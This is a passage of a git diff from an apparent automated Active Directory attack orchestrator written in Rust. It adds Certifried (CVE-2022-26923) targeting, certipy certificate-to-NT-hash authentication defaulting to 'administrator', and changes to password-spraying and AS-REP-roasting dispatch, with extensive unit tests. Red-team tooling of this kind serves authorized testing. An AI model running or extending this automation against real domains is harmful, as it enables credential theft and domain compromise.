Some("dc01.contoso.local".into())); + } + + #[test] + fn collect_dc_hostname_none_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_hostname.is_none()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = 
StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_when_only_cross_forest_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + // Certifried needs a target-domain credential to create a machine + // account in the target forest; cross-forest creds cannot do this. + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_format() { + let key = format!("certifried:{}", "contoso.local"); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIFRIED, "certifried"); + } + + #[test] + fn dc_hostname_from_hosts() { + // Simulates finding a DC hostname from hosts list + let hostname = "dc01.contoso.local"; + let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty()); + assert_eq!(filtered, Some("dc01.contoso.local".to_string())); + + let empty = Some("".to_string()).filter(|h| !h.is_empty()); + assert!(empty.is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + 
"domain": "contoso.local", + "dc_hostname": "dc01.contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "certifried"); + assert_eq!(payload["cve"], "CVE-2022-26923"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_hostname"], "dc01.contoso.local"); + } + + #[test] + fn payload_without_dc_hostname() { + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": null, + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert!(payload["dc_hostname"].is_null()); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: Some("dc01.contoso.local".into()), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into())); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn work_struct_without_hostname() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: None, + credential: cred, + }; + assert!(work.dc_hostname.is_none()); + } +} diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs new file mode 100644 index 00000000..af498b33 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs @@ -0,0 +1,749 @@ +//! auto_certipy_auth -- authenticate using obtained certificates. +//! +//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx), +//! this automation dispatches `certipy auth` to convert the certificate +//! into an NT hash, enabling pass-the-hash for the impersonated user. +//! +//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities +//! which is registered by the ADCS exploitation result processor. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Authenticates with obtained certificates to extract NT hashes. +/// Interval: 30s. +pub async fn auto_certipy_auth(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("certipy_auth") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cert_auth_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "certipy_auth", + "vuln_id": item.vuln_id, + "pfx_path": item.pfx_path, + "domain": item.domain, + "target_user": item.target_user, + }); + + if let Some(ref dc) = item.dc_ip { + payload["target_ip"] = json!(dc); + payload["dc_ip"] = json!(dc); + } + + let priority = dispatcher.effective_priority("certipy_auth"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + user = %item.target_user, + "Certificate authentication dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "Certificate auth deferred"); + } + Err(e) => { + warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth"); + } + } + } + } +} + +/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec { + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "certificate_obtained" && vtype != "adcs_certificate" { + return None; + } + + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + let dedup_key = format!("cert_auth:{}", vuln.vuln_id); + if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) { + return None; + } + + let pfx_path = vuln + .details + .get("pfx_path") + .or_else(|| vuln.details.get("certificate_path")) + .or_else(|| vuln.details.get("cert_file")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string())?; + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let target_user = vuln + .details + .get("target_user") + .or_else(|| vuln.details.get("upn")) + .or_else(|| vuln.details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + Some(CertAuthWork { + vuln_id: vuln.vuln_id.clone(), + dedup_key, + pfx_path, + domain, + target_user, + dc_ip, + }) + }) + .collect() +} + +struct CertAuthWork { + vuln_id: String, + dedup_key: String, + pfx_path: String, + domain: String, + target_user: String, + dc_ip: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("cert_auth:{}", "vuln-cert-001"); + assert_eq!(key, "cert_auth:vuln-cert-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth"); + } + + #[test] + fn cert_vuln_types_accepted() { + let types = [ + "certificate_obtained", + "adcs_certificate", + "CERTIFICATE_OBTAINED", + ]; + for t in &types { + let lower = t.to_lowercase(); + assert!( + lower == "certificate_obtained" || lower == "adcs_certificate", + "{t} should match" + ); + } + } + + #[test] + fn 
non_cert_vuln_types_rejected() { + let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"]; + for t in &non_cert { + let lower = t.to_lowercase(); + assert!(lower != "certificate_obtained" && lower != "adcs_certificate"); + } + } + + #[test] + fn pfx_path_fallback_chain() { + // Primary key + let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"}); + let path = details + .get("pfx_path") + .or_else(|| details.get("certificate_path")) + .or_else(|| details.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path, Some("/tmp/cert.pfx")); + + // Fallback to certificate_path + let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"}); + let path2 = details2 + .get("pfx_path") + .or_else(|| details2.get("certificate_path")) + .or_else(|| details2.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path2, Some("/tmp/alt.pfx")); + + // Fallback to cert_file + let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"}); + let path3 = details3 + .get("pfx_path") + .or_else(|| details3.get("certificate_path")) + .or_else(|| details3.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path3, Some("/tmp/other.pfx")); + + // No key returns None + let details4 = serde_json::json!({}); + let path4 = details4 + .get("pfx_path") + .or_else(|| details4.get("certificate_path")) + .or_else(|| details4.get("cert_file")) + .and_then(|v| v.as_str()); + assert!(path4.is_none()); + } + + #[test] + fn target_user_fallback() { + let details = serde_json::json!({"target_user": "admin"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin"); + + // Falls back to "administrator" when no key present + let details2 = serde_json::json!({}); + let user2 = details2 + .get("target_user") + .or_else(|| details2.get("upn")) + .or_else(|| details2.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user2, "administrator"); + } + + #[test] + fn cert_auth_payload_structure() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert_eq!(payload["technique"], "certipy_auth"); + assert_eq!(payload["pfx_path"], "/tmp/cert.pfx"); + assert_eq!(payload["target_user"], "administrator"); + } + + #[test] + fn cert_auth_payload_with_dc() { + let mut payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + let dc_ip = Some("192.168.58.10".to_string()); + if let Some(ref dc) = dc_ip { + payload["target_ip"] = serde_json::json!(dc); + payload["dc_ip"] = serde_json::json!(dc); + } + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_ip"], "192.168.58.10"); + } + + #[test] + fn cert_auth_payload_without_dc() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert!(payload.get("target_ip").is_none()); + assert!(payload.get("dc_ip").is_none()); + } + + #[test] + fn target_user_upn_fallback() { + let details = serde_json::json!({"upn": "admin@contoso.local"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| 
details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin@contoso.local"); + } + + #[test] + fn target_user_account_name_fallback() { + let details = serde_json::json!({"account_name": "svc_sql"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "svc_sql"); + } + + #[test] + fn cert_auth_work_construction() { + let work = CertAuthWork { + vuln_id: "cert-001".into(), + dedup_key: "cert_auth:cert-001".into(), + pfx_path: "/tmp/cert.pfx".into(), + domain: "contoso.local".into(), + target_user: "administrator".into(), + dc_ip: Some("192.168.58.10".into()), + }; + assert_eq!(work.vuln_id, "cert-001"); + assert_eq!(work.dc_ip, Some("192.168.58.10".into())); + } + + #[test] + fn cert_auth_work_no_dc() { + let work = CertAuthWork { + vuln_id: "cert-002".into(), + dedup_key: "cert_auth:cert-002".into(), + pfx_path: "/tmp/cert2.pfx".into(), + domain: "fabrikam.local".into(), + target_user: "admin".into(), + dc_ip: None, + }; + assert!(work.dc_ip.is_none()); + } + + // -- Tests exercising the extracted `collect_cert_auth_work` function -- + + use crate::orchestrator::state::SharedState; + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: std::collections::HashMap, + ) -> ares_core::models::VulnerabilityInfo { + ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.into(), + vuln_type: vuln_type.into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_certificate_obtained_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("target_user".into(), serde_json::json!("administrator")); + s.discovered_vulnerabilities.insert( + "cert-001".into(), + make_vuln("cert-001", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-001"); + assert_eq!(work[0].pfx_path, "/tmp/admin.pfx"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].target_user, "administrator"); + assert_eq!(work[0].dedup_key, "cert_auth:cert-001"); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_adcs_certificate_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx")); + details.insert("domain".into(), serde_json::json!("fabrikam.local")); + details.insert("target_user".into(), serde_json::json!("svc_sql")); + s.discovered_vulnerabilities.insert( + "cert-002".into(), + make_vuln("cert-002", "adcs_certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + 
assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-002"); + assert_eq!(work[0].domain, "fabrikam.local"); + assert_eq!(work[0].target_user, "svc_sql"); + } + + #[tokio::test] + async fn collect_ignores_non_cert_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + s.discovered_vulnerabilities + .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details)); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_exploited_vulnerabilities() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-010".into(), + make_vuln("cert-010", "certificate_obtained", details), + ); + s.exploited_vulnerabilities.insert("cert-010".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_already_deduped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-020".into(), + make_vuln("cert-020", "certificate_obtained", details), + ); + s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_vuln_without_pfx_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // No pfx_path, certificate_path, or cert_file key at all + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-030".into(), + make_vuln("cert-030", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_certificate_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("certificate_path".into(), serde_json::json!("/tmp/alt.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-040".into(), + make_vuln("cert-040", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/alt.pfx"); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_cert_file() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx")); + details.insert("domain".into(), 
serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-050".into(), + make_vuln("cert-050", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/other.pfx"); + } + + #[tokio::test] + async fn collect_target_user_defaults_to_administrator() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + // No target_user, upn, or account_name + s.discovered_vulnerabilities.insert( + "cert-060".into(), + make_vuln("cert-060", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "administrator"); + } + + #[tokio::test] + async fn collect_target_user_from_upn() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("upn".into(), serde_json::json!("admin@contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-070".into(), + make_vuln("cert-070", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "admin@contoso.local"); + } + + #[tokio::test] + async fn collect_target_user_from_account_name() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("account_name".into(), serde_json::json!("svc_web")); + s.discovered_vulnerabilities.insert( + "cert-080".into(), + make_vuln("cert-080", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "svc_web"); + } + + #[tokio::test] + async fn collect_resolves_dc_ip_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-090".into(), + make_vuln("cert-090", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } + + #[tokio::test] + async fn collect_dc_ip_none_when_domain_not_mapped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC registered for a different domain + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let mut details = std::collections::HashMap::new(); 
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-100".into(), + make_vuln("cert-100", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_domain_defaults_to_empty_string() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // No domain key in details + s.discovered_vulnerabilities.insert( + "cert-110".into(), + make_vuln("cert-110", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-120".into(), + make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()), + ); + s.discovered_vulnerabilities.insert( + "cert-121".into(), + make_vuln("cert-121", "Adcs_Certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + } + + #[tokio::test] + async fn collect_multiple_vulns_mixed_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // Valid cert vuln + let mut d1 = std::collections::HashMap::new(); + d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx")); + d1.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-200".into(), + make_vuln("cert-200", "certificate_obtained", d1), + ); + + // Non-cert vuln (should be ignored) + let mut d2 = std::collections::HashMap::new(); + d2.insert("target_ip".into(), serde_json::json!("192.168.58.22")); + s.discovered_vulnerabilities.insert( + "vuln-smb".into(), + make_vuln("vuln-smb", "smb_signing_disabled", d2), + ); + + // Another valid cert vuln + let mut d3 = std::collections::HashMap::new(); + d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx")); + d3.insert("domain".into(), serde_json::json!("fabrikam.local")); + s.discovered_vulnerabilities.insert( + "cert-201".into(), + make_vuln("cert-201", "adcs_certificate", d3), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect(); + assert!(ids.contains("cert-200")); + assert!(ids.contains("cert-201")); + } + + #[tokio::test] + async fn collect_dc_ip_lookup_is_case_insensitive() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC stored under lowercase + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // Domain in mixed case in vuln details + 
details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL")); + s.discovered_vulnerabilities.insert( + "cert-130".into(), + make_vuln("cert-130", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs index 0baeb0a7..a30f0cf0 100644 --- a/ares-cli/src/orchestrator/automation/credential_access.rs +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -101,10 +101,16 @@ pub async fn auto_credential_access( }; for (domain, dc_ip) in asrep_work { + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(&domain); let payload = json!({ "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], "target_ip": dc_ip, "domain": domain, + "excluded_users": excluded_users.join(","), }); let priority = dispatcher.effective_priority("asrep_roast"); @@ -150,14 +156,14 @@ pub async fn auto_credential_access( if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { return None; } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + // Exact domain match first (using robust DC resolution) + if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) { return Some((dedup, dc_ip, cred_domain, cred.clone())); } // Fallback: check child domains (e.g. cred has "contoso.local" // but user is actually in "child.contoso.local") let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { + for (domain, dc_ip) in &state.all_domains_with_dcs() { if domain.ends_with(&suffix) { debug!( cred_domain = %cred_domain, @@ -215,6 +221,10 @@ pub async fn auto_credential_access( .users .iter() .filter(|u| !u.domain.is_empty()) + // Skip AD built-in disabled accounts (guest, krbtgt, etc.). + // Spraying these can never succeed and burns badPwdCount budget + // that real accounts share under domain lockout policy. + .filter(|u| !ares_core::models::is_always_disabled_account(&u.username)) // Skip delegation accounts — their auth budget is reserved for // S4U exploitation. Spraying them causes lockout before S4U fires. .filter(|u| !state.is_delegation_account(&u.username)) @@ -256,10 +266,16 @@ pub async fn auto_credential_access( } sprayed_domains.insert(domain.clone()); + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(domain); let payload = json!({ "technique": "username_as_password", "target_ip": dc_ip, "domain": domain, + "excluded_users": excluded_users.join(","), }); match dispatcher @@ -510,12 +526,19 @@ pub async fn auto_credential_access( }; for (domain, dc_ip) in common_spray_work { + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(&domain); let payload = json!({ "techniques": ["password_spray", "username_as_password"], "reason": "low_hanging_fruit", "target_ip": dc_ip, "domain": domain, "use_common_passwords": true, + "acknowledge_no_policy": true, + "excluded_users": excluded_users.join(","), }); // Mark as processed BEFORE submitting to prevent duplicate deferred entries. 
@@ -552,6 +575,8 @@ pub async fn auto_credential_access( mod tests { use super::*; + // --- kerberoast_dedup_key --- + #[test] fn kerberoast_dedup_key_basic() { assert_eq!( @@ -573,6 +598,8 @@ mod tests { assert_eq!(kerberoast_dedup_key("", ""), "krb::"); } + // --- spray_dedup_key --- + #[test] fn spray_dedup_key_basic() { assert_eq!( @@ -591,6 +618,8 @@ mod tests { assert_eq!(spray_dedup_key("", ""), ":"); } + // --- common_spray_dedup_key --- + #[test] fn common_spray_dedup_key_basic() { assert_eq!( @@ -604,6 +633,8 @@ mod tests { assert_eq!(common_spray_dedup_key(""), "common:"); } + // --- low_hanging_dedup_key --- + #[test] fn low_hanging_dedup_key_basic() { assert_eq!( @@ -617,6 +648,8 @@ mod tests { assert_eq!(low_hanging_dedup_key("", ""), ":"); } + // --- credential_secretsdump_dedup_key --- + #[test] fn credential_secretsdump_dedup_key_basic() { assert_eq!( @@ -639,6 +672,8 @@ mod tests { assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::"); } + // --- resolve_host_domain_from_fqdn --- + #[test] fn resolve_host_domain_from_fqdn_typical() { assert_eq!( @@ -673,6 +708,8 @@ mod tests { assert_eq!(resolve_host_domain_from_fqdn(""), ""); } + // --- is_host_domain_related --- + #[test] fn is_host_domain_related_same_domain() { assert!(is_host_domain_related("contoso.local", "contoso.local")); diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs index 773af2d6..dcae7770 100644 --- a/ares-cli/src/orchestrator/automation/credential_expansion.rs +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs 